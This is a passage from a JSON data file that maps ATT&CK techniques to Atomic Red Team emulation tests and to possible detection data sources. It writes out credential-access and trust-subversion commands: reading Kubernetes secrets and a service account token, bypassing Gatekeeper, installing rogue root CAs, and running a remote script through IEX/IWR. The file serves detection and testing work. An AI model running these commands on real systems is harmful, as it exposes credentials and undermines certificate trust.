"relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": 
"Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1552.007", + "command_list": [ + "kubectl get secrets -n default\n", + "kubectl --context kind-atomic-cluster exec atomic-pod -- cat /run/secrets/kubernetes.io/serviceaccount/token\n" + ], + "commands": [ + { + "command": "kubectl get secrets -n default\n", + "source": "atomics/T1552.007/T1552.007.yaml", + "name": "Atomic Red Team Test - Kubernetes List Secrets" + }, + { + "command": "kubectl --context kind-atomic-cluster exec atomic-pod -- cat /run/secrets/kubernetes.io/serviceaccount/token\n", + "source": "atomics/T1552.007/T1552.007.yaml", + "name": "Atomic Red Team Test - Kubernetes List Secrets" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1552.007", + "display_name": "Kubernetes List Secrets", + "atomic_tests": [ + { + "name": "ListSecrets", + "auto_generated_guid": "43c3a49d-d15c-45e6-b303-f6e177e44a9a", + "description": "A Kubernetes secret is an object that lets users store and manage sensitive information, such as passwords and connection strings in the cluster. Secrets can be consumed by reference in the pod configuration. 
Attackers who have permissions to retrieve the secrets from the API server (by using the pod service account, for example) can access sensitive information that might include credentials to various services.\n", + "supported_platforms": [ + "containers" + ], + "input_arguments": { + "namespace": { + "description": "K8s namespace to list", + "type": "String", + "default": "default" + } + }, + "dependencies": [ + { + "description": "kubectl must be installed\n", + "get_prereq_command": "echo \"kubectl must be installed manually\"\n", + "prereq_command": "which kubectl\n" + } + ], + "executor": { + "command": "kubectl get secrets -n #{namespace}\n", + "name": "bash", + "elevation_required": false + } + }, + { + "name": "Cat the contents of a Kubernetes service account token file", + "auto_generated_guid": "788e0019-a483-45da-bcfe-96353d46820f", + "description": "Access the Kubernetes service account access token stored within a container in a cluster.\n", + "supported_platforms": [ + "linux" + ], + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "Verify docker is installed.", + "prereq_command": "which docker\n", + "get_prereq_command": "if [ \"\" == \"`which docker`\" ]; then echo \"Docker Not Found\"; if [ -n \"`which apt-get`\" ]; then sudo apt-get -y install docker ; elif [ -n \"`which yum`\" ]; then sudo yum -y install docker ; fi ; else echo \"Docker installed\"; fi\n" + }, + { + "description": "Verify docker service is running.", + "prereq_command": "sudo systemctl status docker\n", + "get_prereq_command": "sudo systemctl start docker\n" + }, + { + "description": "Verify kind is in the path.", + "prereq_command": "which kind\n", + "get_prereq_command": "curl -Lo ./kind https://kind.sigs.k8s.io/dl/v0.10.0/kind-linux-amd64\nchmod +x ./kind\nmv kind /usr/bin/kind\n" + }, + { + "description": "Verify kind-atomic-cluster is created", + "prereq_command": "sudo kind get clusters\n", + "get_prereq_command": "sudo kind create cluster --name 
atomic-cluster\n" + }, + { + "description": "Verify kubectl is in path", + "prereq_command": "which kubectl\n", + "get_prereq_command": "curl -LO \"https://dl.k8s.io/release/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl\"\nchmod +x ./kubectl\nmv kubectl /usr/bin/kubectl\n" + }, + { + "description": "Verify atomic-pod is running.", + "prereq_command": "kubectl --context kind-atomic-cluster get pods |grep atomic-pod\n", + "get_prereq_command": "kubectl --context kind-atomic-cluster run atomic-pod --image=alpine --command -- sleep infinity\n" + } + ], + "executor": { + "command": "kubectl --context kind-atomic-cluster exec atomic-pod -- cat /run/secrets/kubernetes.io/serviceaccount/token\n", + "name": "sh", + "cleanup_command": "kubectl --context kind-atomic-cluster delete pod atomic-pod\n" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + 
"target_data_element": "command" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate to", + "target_data_element": "computer" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. 
It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate to", + "target_data_element": "application" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate to", + "target_data_element": "cloud service" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. 
It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate from", + "target_data_element": "ip" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate from", + "target_data_element": "port" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. 
It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "application", + "relationship": "attempted to authenticate", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "cloud service", + "relationship": "attempted to authenticate", + "target_data_element": "user" + } + ], + "external_reference": [ + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/security-principals" + ] + ] + }, + { + "technique_id": "T1553.001", + "command_list": [ + "sudo xattr -d com.apple.quarantine myapp.app\n" + ], + "commands": [ + { + "command": "sudo 
xattr -d com.apple.quarantine myapp.app\n", + "source": "atomics/T1553.001/T1553.001.yaml", + "name": "Atomic Red Team Test - Subvert Trust Controls: Gatekeeper Bypass" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1553.001", + "display_name": "Subvert Trust Controls: Gatekeeper Bypass", + "atomic_tests": [ + { + "name": "Gatekeeper Bypass", + "auto_generated_guid": "fb3d46c6-9480-4803-8d7d-ce676e1f1a9b", + "description": "Gatekeeper Bypass via command line\n", + "supported_platforms": [ + "macos" + ], + "input_arguments": { + "app_path": { + "description": "Path to app to be used", + "type": "Path", + "default": "myapp.app" + } + }, + "executor": { + "command": "sudo xattr -d com.apple.quarantine #{app_path}\n", + "elevation_required": true, + "name": "sh" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file stream" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "retrieved information about", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + 
"Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1553.004", + "command_list": [ + "openssl genrsa -out #{key_filename} 4096\nopenssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -subj \"/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com\" -out rootCA.crt\ncp rootCA.crt /etc/pki/ca-trust/source/anchors/\nupdate-ca-trust\n", + "openssl genrsa -out rootCA.key 4096\nopenssl req -x509 -new -nodes -key rootCA.key -sha256 -days 365 -subj \"/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com\" -out #{cert_filename}\ncp #{cert_filename} 
/etc/pki/ca-trust/source/anchors/\nupdate-ca-trust\n", + "mv rootCA.crt /usr/local/share/ca-certificates\necho sudo update-ca-certificates\n", + "mv #{cert_filename} /usr/local/share/ca-certificates\necho sudo update-ca-certificates\n", + "sudo security add-trusted-cert -d -r trustRoot -k \"/Library/Keychains/System.keychain\" \"rootCA.crt\"\n", + "sudo security add-trusted-cert -d -r trustRoot -k \"/Library/Keychains/System.keychain\" \"#{cert_filename}\"\n", + "$cert = Import-Certificate -FilePath rootCA.cer -CertStoreLocation Cert:\\LocalMachine\\My\nMove-Item -Path $cert.PSPath -Destination \"Cert:\\LocalMachine\\Root\"\n", + "certutil -addstore my $env:Temp\\rootCA2.cer\n", + "IEX (IWR 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1553.004/src/RemoteCertTrust.ps1' -UseBasicParsing) \n" + ], + "commands": [ + { + "command": "openssl genrsa -out #{key_filename} 4096\nopenssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -subj \"/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com\" -out rootCA.crt\ncp rootCA.crt /etc/pki/ca-trust/source/anchors/\nupdate-ca-trust\n", + "source": "atomics/T1553.004/T1553.004.yaml", + "name": "Atomic Red Team Test - Subvert Trust Controls: Install Root Certificate" + }, + { + "command": "openssl genrsa -out rootCA.key 4096\nopenssl req -x509 -new -nodes -key rootCA.key -sha256 -days 365 -subj \"/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com\" -out #{cert_filename}\ncp #{cert_filename} /etc/pki/ca-trust/source/anchors/\nupdate-ca-trust\n", + "source": "atomics/T1553.004/T1553.004.yaml", + "name": "Atomic Red Team Test - Subvert Trust Controls: Install Root Certificate" + }, + { + "command": "mv rootCA.crt /usr/local/share/ca-certificates\necho sudo update-ca-certificates\n", + "source": "atomics/T1553.004/T1553.004.yaml", + "name": "Atomic Red Team Test - Subvert Trust Controls: Install Root Certificate" + }, + { + "command": "mv #{cert_filename} /usr/local/share/ca-certificates\necho 
sudo update-ca-certificates\n", + "source": "atomics/T1553.004/T1553.004.yaml", + "name": "Atomic Red Team Test - Subvert Trust Controls: Install Root Certificate" + }, + { + "command": "sudo security add-trusted-cert -d -r trustRoot -k \"/Library/Keychains/System.keychain\" \"rootCA.crt\"\n", + "source": "atomics/T1553.004/T1553.004.yaml", + "name": "Atomic Red Team Test - Subvert Trust Controls: Install Root Certificate" + }, + { + "command": "sudo security add-trusted-cert -d -r trustRoot -k \"/Library/Keychains/System.keychain\" \"#{cert_filename}\"\n", + "source": "atomics/T1553.004/T1553.004.yaml", + "name": "Atomic Red Team Test - Subvert Trust Controls: Install Root Certificate" + }, + { + "command": "$cert = Import-Certificate -FilePath rootCA.cer -CertStoreLocation Cert:\\LocalMachine\\My\nMove-Item -Path $cert.PSPath -Destination \"Cert:\\LocalMachine\\Root\"\n", + "source": "atomics/T1553.004/T1553.004.yaml", + "name": "Atomic Red Team Test - Subvert Trust Controls: Install Root Certificate" + }, + { + "command": "certutil -addstore my $env:Temp\\rootCA2.cer\n", + "source": "atomics/T1553.004/T1553.004.yaml", + "name": "Atomic Red Team Test - Subvert Trust Controls: Install Root Certificate" + }, + { + "command": "IEX (IWR 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1553.004/src/RemoteCertTrust.ps1' -UseBasicParsing) \n", + "source": "atomics/T1553.004/T1553.004.yaml", + "name": "Atomic Red Team Test - Subvert Trust Controls: Install Root Certificate" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1553.004", + "display_name": "Subvert Trust Controls: Install Root Certificate", + "atomic_tests": [ + { + "name": "Install root CA on CentOS/RHEL", + "auto_generated_guid": "9c096ec4-fd42-419d-a762-d64cc950627e", + "description": "Creates a root CA with openssl\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "cert_filename": { + "description": "Path of the CA certificate we create", + "type": "Path", 
+ "default": "rootCA.crt" + }, + "key_filename": { + "description": "Key we create that is used to create the CA certificate", + "type": "Path", + "default": "rootCA.key" + } + }, + "executor": { + "command": "openssl genrsa -out #{key_filename} 4096\nopenssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -subj \"/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com\" -out #{cert_filename}\ncp #{cert_filename} /etc/pki/ca-trust/source/anchors/\nupdate-ca-trust\n", + "cleanup_command": "rm /etc/pki/ca-trust/source/anchors/#{cert_filename}\nupdate-ca-trust\n", + "name": "sh", + "elevation_required": true + } + }, + { + "name": "Install root CA on Debian/Ubuntu", + "auto_generated_guid": "53bcf8a0-1549-4b85-b919-010c56d724ff", + "description": "Creates a root CA with openssl\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "cert_filename": { + "description": "CA file name", + "type": "Path", + "default": "rootCA.crt" + }, + "key_filename": { + "description": "Key we create that is used to create the CA certificate", + "type": "Path", + "default": "rootCA.key" + } + }, + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "Verify the certificate exists. It generates if not on disk.\n", + "prereq_command": "if [ -f #{cert_filename} ]; then exit 0; else exit 1; fi;\n", + "get_prereq_command": "if [ ! 
-f #{key_filename} ]; then openssl genrsa -out #{key_filename} 4096; fi;\nopenssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -subj \"/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com\" -out #{cert_filename}\n" + } + ], + "executor": { + "command": "mv #{cert_filename} /usr/local/share/ca-certificates\necho sudo update-ca-certificates\n", + "name": "sh", + "elevation_required": true + } + }, + { + "name": "Install root CA on macOS", + "auto_generated_guid": "cc4a0b8c-426f-40ff-9426-4e10e5bf4c49", + "description": "Creates a root CA with openssl\n", + "supported_platforms": [ + "macos" + ], + "input_arguments": { + "cert_filename": { + "description": "CA file name", + "type": "Path", + "default": "rootCA.crt" + }, + "key_filename": { + "description": "Key we create that is used to create the CA certificate", + "type": "Path", + "default": "rootCA.key" + } + }, + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "Verify the certificate exists. It generates if not on disk.\n", + "prereq_command": "if [ -f #{cert_filename} ]; then exit 0; else exit 1; fi;\n", + "get_prereq_command": "if [ ! 
-f #{key_filename} ]; then openssl genrsa -out #{key_filename} 4096; fi;\nopenssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -subj \"/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com\" -out #{cert_filename}\n" + } + ], + "executor": { + "command": "sudo security add-trusted-cert -d -r trustRoot -k \"/Library/Keychains/System.keychain\" \"#{cert_filename}\"\n", + "name": "sh", + "elevation_required": true + } + }, + { + "name": "Install root CA on Windows", + "auto_generated_guid": "76f49d86-5eb1-461a-a032-a480f86652f1", + "description": "Creates a root CA with Powershell\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "pfx_path": { + "description": "Path of the certificate", + "type": "Path", + "default": "rootCA.cer" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Verify the certificate exists. It generates if not on disk.\n", + "prereq_command": "if (Test-Path #{pfx_path}) { exit 0 } else { exit 1 }\n", + "get_prereq_command": "$cert = New-SelfSignedCertificate -DnsName atomicredteam.com -CertStoreLocation cert:\\LocalMachine\\My\nExport-Certificate -Type CERT -Cert Cert:\\LocalMachine\\My\\$($cert.Thumbprint) -FilePath #{pfx_path}\nGet-ChildItem Cert:\\LocalMachine\\My\\$($cert.Thumbprint) | Remove-Item\n" + } + ], + "executor": { + "command": "$cert = Import-Certificate -FilePath #{pfx_path} -CertStoreLocation Cert:\\LocalMachine\\My\nMove-Item -Path $cert.PSPath -Destination \"Cert:\\LocalMachine\\Root\"\n", + "cleanup_command": "try {\n $cert = Import-Certificate -FilePath #{pfx_path} -CertStoreLocation Cert:\\LocalMachine\\My -ErrorAction Ignore\n Get-ChildItem Cert:\\LocalMachine\\My\\$($cert.Thumbprint) -ErrorAction Ignore | Remove-Item -ErrorAction Ignore\n Get-ChildItem Cert:\\LocalMachine\\Root\\$($cert.Thumbprint) -ErrorAction Ignore | Remove-Item -ErrorAction Ignore\n}\ncatch { }\n", + "name": "powershell", + "elevation_required": true + } + }, + { + "name": 
"Install root CA on Windows with certutil", + "auto_generated_guid": "5fdb1a7a-a93c-4fbe-aa29-ddd9ef94ed1f", + "description": "Creates a root CA with certutil\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "pfx_path": { + "description": "Path of the certificate", + "type": "Path", + "default": "$env:Temp\\rootCA2.cer" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Certificate must exist at specified location (#{pfx_path})\n", + "prereq_command": "if (Test-Path #{pfx_path}) { exit 0 } else { exit 1 }\n", + "get_prereq_command": "$cert = New-SelfSignedCertificate -DnsName atomicredteam.com -CertStoreLocation cert:\\LocalMachine\\My\nExport-Certificate -Type CERT -Cert Cert:\\LocalMachine\\My\\$($cert.Thumbprint) -FilePath #{pfx_path}\nGet-ChildItem Cert:\\LocalMachine\\My\\$($cert.Thumbprint) | Remove-Item\n" + } + ], + "executor": { + "command": "certutil -addstore my #{pfx_path}\n", + "cleanup_command": "try {\n$cert = Import-Certificate -FilePath #{pfx_path} -CertStoreLocation Cert:\\LocalMachine\\My\nGet-ChildItem Cert:\\LocalMachine\\My\\$($cert.Thumbprint) -ErrorAction Ignore | Remove-Item -ErrorAction Ignore\nGet-ChildItem Cert:\\LocalMachine\\Root\\$($cert.Thumbprint) -ErrorAction Ignore | Remove-Item -ErrorAction Ignore\n} catch { }\n", + "name": "powershell", + "elevation_required": true + } + }, + { + "name": "Add Root Certificate to CurrentUser Certificate Store", + "auto_generated_guid": "ca20a3f1-42b5-4e21-ad3f-1049199ec2e0", + "description": "The following Atomic test simulates adding a generic non-malicious certificate to the CurrentUser certificate store. 
This behavior generates a registry modification that adds the cloned root CA certificate in the keys outlined in the blog.\nKeys will look like - \\SystemCertificates\\CA\\Certificates or \\SystemCertificates\\Root\\Certificates\nReference: https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "IEX (IWR 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1553.004/src/RemoteCertTrust.ps1' -UseBasicParsing) \n", + "cleanup_command": "Get-ChildItem -Path Cert:\\ -Recurse | Where-Object { $_.Thumbprint -eq '1F3D38F280635F275BE92B87CF83E40E40458400' } | remove-item \n", + "name": "powershell", + "elevation_required": true + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key creation", + "description": "A registry key was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key creation", + "description": "A registry key was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", 
+ "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + 